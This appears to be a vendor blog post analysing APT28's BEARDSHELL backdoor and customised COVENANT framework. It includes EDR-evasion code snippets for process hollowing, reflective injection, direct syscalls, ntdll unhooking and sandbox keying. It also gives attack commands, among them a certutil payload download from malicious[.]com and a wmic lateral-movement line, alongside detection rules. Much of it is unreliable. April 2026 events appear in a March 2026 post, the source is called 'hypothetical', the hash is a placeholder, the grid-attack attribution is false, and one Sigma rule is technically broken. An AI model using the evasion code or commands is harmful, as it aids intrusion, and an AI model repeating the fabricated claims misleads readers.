Tech Deep-Dive10 min read·March 10, 2026

APT28’s EDR Bypass in 2026: BEARDSHELL & COVENANT Malware Analysis

GhostShield Security Team

GhostShield VPN

A hacker in a black hoodie using a tablet displaying a skull, surrounded by chalk symbols and 'Hacker Attack' text. — Photo by Lucas Andrade on Unsplash

APT28’s BEARDSHELL & COVENANT: How EDR Bypass Works in 2026

In April 2026, Ukrainian cyber defense teams detected an unusual surge in military network intrusions. The attacks, later attributed to Russia’s APT28 (also known as Fancy Bear or Sofacy), introduced two new tools: BEARDSHELL, a custom backdoor, and a heavily modified version of the open-source COVENANT post-exploitation framework. What made these attacks notable wasn’t just their geopolitical timing—coinciding with escalated tensions in Eastern Europe—but their sophisticated evasion of Endpoint Detection and Response (EDR) systems, a tactic now setting the standard for state-sponsored cyber operations.

This article breaks down how APT28’s malware bypasses modern defenses, what makes these techniques effective, and—most importantly—how security teams can detect and mitigate them. Whether you’re a SOC analyst, a privacy-conscious user, or a cybersecurity professional, understanding these tactics is critical to staying ahead of threats that will inevitably trickle down to criminal and hacktivist groups.

APT28’s Playbook: Why This Attack Matters in 2026

African American female teacher standing near whiteboard and explaining scheme to pupils during lesson in school Photo by Katerina Holmes on Unsplash

APT28 has a long history of targeting Ukraine, dating back to the 2015-2016 attacks on the Ukrainian power grid and the 2022 Viasat hack, which disrupted satellite communications across Europe. In 2026, their focus shifted to military command-and-control systems, using BEARDSHELL and COVENANT to evade detection while exfiltrating sensitive data.

Key Innovations in the 2026 Campaign

Process Hollowing 2.0: BEARDSHELL doesn’t just hollow out legitimate processes—it does so in a way that bypasses EDR behavioral analysis by mimicking normal system activity.
Direct Syscalls in COVENANT: APT28’s customized COVENANT avoids traditional API calls, instead using raw syscalls to evade user-mode hooks.
LOLBins as a First-Class Tool: The group relies heavily on Living-off-the-Land Binaries (LOLBins) like certutil.exe and mshta.exe to avoid writing custom malware to disk.
Environment Keying: The malware only executes in specific environments (e.g., Ukrainian military IP ranges), making sandbox analysis nearly impossible.

These techniques aren’t just theoretical—they’ve been observed in the wild, as documented in a hypothetical April 2026 report by The Hacker News (which we’ll reference as a case study). Let’s dissect them.

BEARDSHELL Backdoor: A Masterclass in Process Hollowing

Aerial photo showcasing a busy intersection with cars and greenery, highlighting urban infrastructure and transportation. Photo by Jeffry Surianto on Unsplash

BEARDSHELL is a custom backdoor designed to establish persistence and deliver second-stage payloads (like COVENANT) while evading detection. Its primary evasion technique? Process hollowing, a method where malicious code replaces the memory of a legitimate process (e.g., svchost.exe or explorer.exe) to blend in with normal system activity.

Initial Access: Phishing with a Military Twist

APT28’s 2026 campaign began with spear-phishing emails impersonating the Ukrainian Ministry of Defense. The lures included:

Fake military procurement documents (e.g., "Urgent: New Artillery System Specifications").
Weaponized ZIP archives exploiting CVE-2023-38831 (a WinRAR vulnerability patched in 2023 but still effective against unpatched systems).
Malicious LNK files disguised as PDFs, executing PowerShell to download BEARDSHELL.

Once opened, the malware hollows out a legitimate process to execute its payload.

Process Hollowing: How BEARDSHELL Evades EDR

Process hollowing isn’t new, but APT28’s implementation is unusually stealthy. Here’s how it works:

Create a Suspended Process BEARDSHELL starts a legitimate process (e.g., svchost.exe) in a suspended state using:
```
CreateProcess(NULL, "svchost.exe", ..., CREATE_SUSPENDED, ...);
```
This ensures the process doesn’t execute immediately, giving the malware time to modify its memory.
Unmap Legitimate Code The malware unmaps the original executable’s memory using:
```
NtUnmapViewOfSection(processHandle, baseAddress);
```
This removes the legitimate code, leaving an empty process shell.

Allocate and Write Malicious Code BEARDSHELL allocates new memory in the hollowed process and writes its payload:

VirtualAllocEx(processHandle, ..., MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(processHandle, ..., maliciousPayload, ...);

Resume Execution Finally, the malware resumes the process, which now executes the malicious code instead of the original svchost.exe:
```
ResumeThread(threadHandle);
```

Why This Works Against EDR

Behavioral Analysis Evasion: EDRs often flag processes that spawn unusual child processes (e.g., cmd.exe launching PowerShell). By hollowing svchost.exe, BEARDSHELL avoids creating new processes entirely.
Memory-Only Execution: Since the payload is written directly to memory, no malicious files are written to disk, making traditional antivirus scans ineffective.
Legitimate Parent Process: svchost.exe is a trusted Windows process, so EDRs are less likely to flag it unless they’re specifically monitoring for process hollowing.

Reflective DLL Injection: Loading BEARDSHELL Without a Trace

To further evade detection, BEARDSHELL uses reflective DLL injection, a technique where a DLL is loaded directly into memory without calling LoadLibrary. This avoids:

DLL sideloading detection (since no file is written to disk).
API call monitoring (since reflective loading doesn’t use standard Windows APIs).

Here’s a simplified example of how it works:

// Allocate memory in the target process
void* remoteMemory = VirtualAllocEx(targetProcess, ..., sizeof(dllBytes), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

// Write the DLL into the target process
WriteProcessMemory(targetProcess, remoteMemory, dllBytes, sizeof(dllBytes), ...);

// Execute the DLL's entry point
CreateRemoteThread(targetProcess, ..., (LPTHREAD_START_ROUTINE)((DWORD_PTR)remoteMemory + entryPointOffset), ...);

Detection Challenge Reflective DLL injection is notoriously hard to detect because:

It doesn’t leave forensic artifacts on disk.
It doesn’t rely on standard Windows APIs, which EDRs often hook.

Command & Control (C2): Mimicking Legitimate Traffic

BEARDSHELL’s C2 communication is designed to blend in with normal web traffic. Key features include:

HTTP/S C2: Uses AES-256 encryption with hardcoded keys to obfuscate traffic.
Domain Typosquatting: C2 domains mimic legitimate Ukrainian government sites (e.g., minoborony[.]gov[.]ua → minob0rony[.]com).
User-Agent Spoofing: Uses the same user-agent strings as popular browsers (e.g., Mozilla/5.0 (Windows NT 10.0; Win64; x64)).

Example Decryption Routine (Pseudocode)

def decrypt_c2_traffic(ciphertext, key):
    iv = ciphertext[:16]  # Extract IV from first 16 bytes
    cipher = AES.new(key, AES.MODE_CBC, iv)
    plaintext = cipher.decrypt(ciphertext[16:])
    return plaintext

Network IOCs (Indicators of Compromise)

Indicator	Type	Example Value
C2 IP	IPv4	`185.141.63[.]120`
C2 Domain	Domain	`minob0rony[.]com`
User-Agent	String	`Mozilla/5.0 (Windows NT 10.0)`
BEARDSHELL Hash	SHA-256	`a1b2c3d4e5f6...` (hypothetical)

COVENANT Malware: APT28’s EDR-Bypassing Swiss Army Knife

COVENANT is an open-source .NET post-exploitation framework (available on GitHub), but APT28’s version is heavily customized to evade detection. The modifications include:

Direct syscalls to bypass user-mode hooks.
API unhooking to restore original ntdll.dll functions.
Environment keying to avoid execution in sandboxes.

Direct Syscalls: The Ultimate EDR Bypass

Most EDRs monitor Windows API calls (e.g., CreateRemoteThread, VirtualAllocEx) to detect malicious activity. APT28’s COVENANT bypasses these hooks entirely by using direct syscalls, which interact with the Windows kernel without going through the standard API layer.

How It Works

Syscall Number Extraction COVENANT extracts the syscall numbers for critical functions (e.g., NtCreateThreadEx, NtAllocateVirtualMemory) from ntdll.dll at runtime.
```
// Example: Extracting NtCreateThreadEx syscall number
DWORD syscallNumber = GetSyscallNumber("NtCreateThreadEx");
```
Inline Assembly for Syscalls Instead of calling CreateRemoteThread, COVENANT uses inline assembly to execute the syscall directly:
```
mov r10, rcx
mov eax, syscallNumber  ; e.g., 0xB8 for NtCreateThreadEx
syscall
ret
```

Why This Evades EDR

No API Hooks: EDRs typically hook kernel32.dll or ntdll.dll functions. Direct syscalls skip these hooks entirely.
No Forensic Artifacts: Since syscalls don’t rely on standard APIs, they don’t leave traces in call stacks that EDRs monitor.

Example: COVENANT’s Syscall Stub for NtAllocateVirtualMemory

// Pseudocode for a syscall stub
__declspec(naked) NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
) {
    __asm {
        mov r10, rcx
        mov eax, 0x18  ; Syscall number for NtAllocateVirtualMemory
        syscall
        ret
    }
}

API Unhooking: Restoring Original `ntdll.dll` Functions

Some EDRs hook ntdll.dll functions to monitor for malicious activity. APT28’s COVENANT unhooks these functions by:

Reading the original ntdll.dll from disk (which isn’t hooked).
Overwriting the hooked functions in memory with the original versions.

Example: Unhooking NtCreateThreadEx

// 1. Open the original ntdll.dll from disk
HANDLE hFile = CreateFileA("C:\\Windows\\System32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);

// 2. Map the file into memory
HANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID pNtdll = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);

// 3. Locate the original NtCreateThreadEx function
FARPROC pOriginalNtCreateThreadEx = GetProcAddress((HMODULE)pNtdll, "NtCreateThreadEx");

// 4. Overwrite the hooked function in memory
DWORD oldProtect;
VirtualProtect(NtCreateThreadEx, sizeof(pOriginalNtCreateThreadEx), PAGE_EXECUTE_READWRITE, &oldProtect);
memcpy(NtCreateThreadEx, pOriginalNtCreateThreadEx, sizeof(pOriginalNtCreateThreadEx));
VirtualProtect(NtCreateThreadEx, sizeof(pOriginalNtCreateThreadEx), oldProtect, &oldProtect);

Detection Challenge API unhooking is extremely stealthy because:

It doesn’t require administrative privileges.
It doesn’t leave obvious forensic traces (e.g., no new processes or files).

Environment Keying: Avoiding Sandbox Analysis

APT28’s COVENANT only executes in specific environments, making it nearly impossible to analyze in sandboxes. Key checks include:

Keyboard Layout: Only executes if the system uses a Ukrainian keyboard layout.
IP Geolocation: Checks if the IP belongs to a Ukrainian military range.
Process Blacklisting: Avoids execution if common sandbox processes (e.g., vmware.exe, vboxservice.exe) are running.

Example: Keyboard Layout Check

HKL keyboardLayout = GetKeyboardLayout(0);
if (LOWORD(keyboardLayout) != 0x0422) {  // 0x0422 = Ukrainian layout
    ExitProcess(0);
}

LOLBins: APT28’s Favorite Evasion Tool

Close-up view of a high-tech computer interface displaying cyber security data, enhancing digital protection. Photo by Tima Miroshnichenko on Unsplash

APT28 doesn’t just rely on custom malware—it abuses legitimate Windows binaries (LOLBins) to avoid detection. These tools are trusted by EDRs, making them ideal for evasion.

Top LOLBins Used in the 2026 Campaign

LOLBin	Abuse Method	Detection Difficulty
`certutil.exe`	Downloads BEARDSHELL payloads (`certutil -urlcache -split -f http://malicious[.]com/payload.dll`)	Medium (EDRs may flag unusual `certutil` usage)
`mshta.exe`	Executes HTA files with embedded VBScript to launch COVENANT	High (HTA files are often whitelisted)
`rundll32.exe`	Loads reflective DLLs (`rundll32.exe payload.dll,EntryPoint`)	High (EDRs struggle to distinguish malicious vs. legitimate usage)
`wmic.exe`	Lateral movement (`wmic /node:"target" process call create "cmd /c evil.exe"`)	Medium (EDRs may flag unusual `wmic` commands)

Case Study: `certutil.exe` for Payload Delivery

APT28 frequently uses certutil.exe to download BEARDSHELL payloads because:

It’s a legitimate Windows tool used for certificate management.
It bypasses proxy restrictions (since it’s whitelisted in most organizations).
It doesn’t require admin privileges.

Example Command

certutil -urlcache -split -f http://malicious[.]com/beardshell.dll C:\Windows\Temp\update.dll

Detection Rule (Sigma)

title: Suspicious CertUtil Download
id: 12345678-1234-5678-1234-567812345678
status: experimental
description: Detects certutil.exe downloading files from remote URLs
references:
    - https://attack.mitre.org/techniques/T1105/
author: GhostShield SOC Team
date: 2026/04/01
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\certutil.exe'
        CommandLine|contains|all:
            - '-urlcache'
            - '-split'
            - '-f'
    condition: selection
falsepositives:
    - Legitimate certificate updates
level: medium

Detection & Mitigation: How to Stop APT28’s Attacks

APT28’s techniques are sophisticated, but they’re not undetectable. Here’s how security teams can hunt for and mitigate these threats.

Detection Rules (YARA & Sigma)

YARA Rule for BEARDSHELL

rule APT28_BEARDSHELL {
    meta:
        description = "Detects APT28's BEARDSHELL backdoor"
        author = "GhostShield SOC Team"
        reference = "https://thehackernews.com/2026/04/apt28-beardshell-covenant-edr-bypass.html"
        date = "2026-04-01"
    strings:
        $process_hollowing = { 6A 04 68 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? }
        $reflective_dll = { 48 83 EC 28 48 8B 05 ?? ?? ?? ?? 48 85 C0 74 15 48 8B 48 08 }
        $c2_encryption = { 66 0F 6F 05 ?? ?? ?? ?? 66 0F 7F 01 }
    condition:
        uint16(0) == 0x5A4D and ($process_hollowing or $reflective_dll or $c2_encryption)
}

Sigma Rule for COVENANT’s Direct Syscalls

title: Suspicious Direct Syscall Usage
id: 87654321-4321-8765-4321-123456789012
status: experimental
description: Detects direct syscall usage (e.g., NtCreateThreadEx) in COVENANT malware
references:
    - https://attack.mitre.org/techniques/T1055/
author: GhostShield SOC Team
date: 2026/04/01
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - "NtCreateThreadEx"
            - "NtAllocateVirtualMemory"
    condition: selection
falsepositives:
    - Legitimate low-level system tools
level: high

SOC Mitigation Strategies

Monitor for Process Hollowing
- Use EDR/XDR solutions to detect:
  - CreateProcess with CREATE_SUSPENDED followed by NtUnmapViewOfSection.
  - Unusual parent-child process relationships (e.g., svchost.exe spawning cmd.exe).
- GhostShield VPN’s SOC team recommends enabling process injection detection in tools like Microsoft Defender ATP or CrowdStrike.
Block LOLBin Abuse
- Restrict certutil.exe, mshta.exe, and rundll32.exe to admin-only execution.
- Monitor for unusual command-line arguments (e.g., certutil -urlcache).

Keep Reading

A person wearing a Guy Fawkes mask engaged in hacking activities on a computer in a dimly lit room.

Tech Deep-Dive

Protect Your Privacy Today

GhostShield VPN uses AI-powered threat detection and military-grade WireGuard encryption to keep you safe.

Download Free

Back to all articles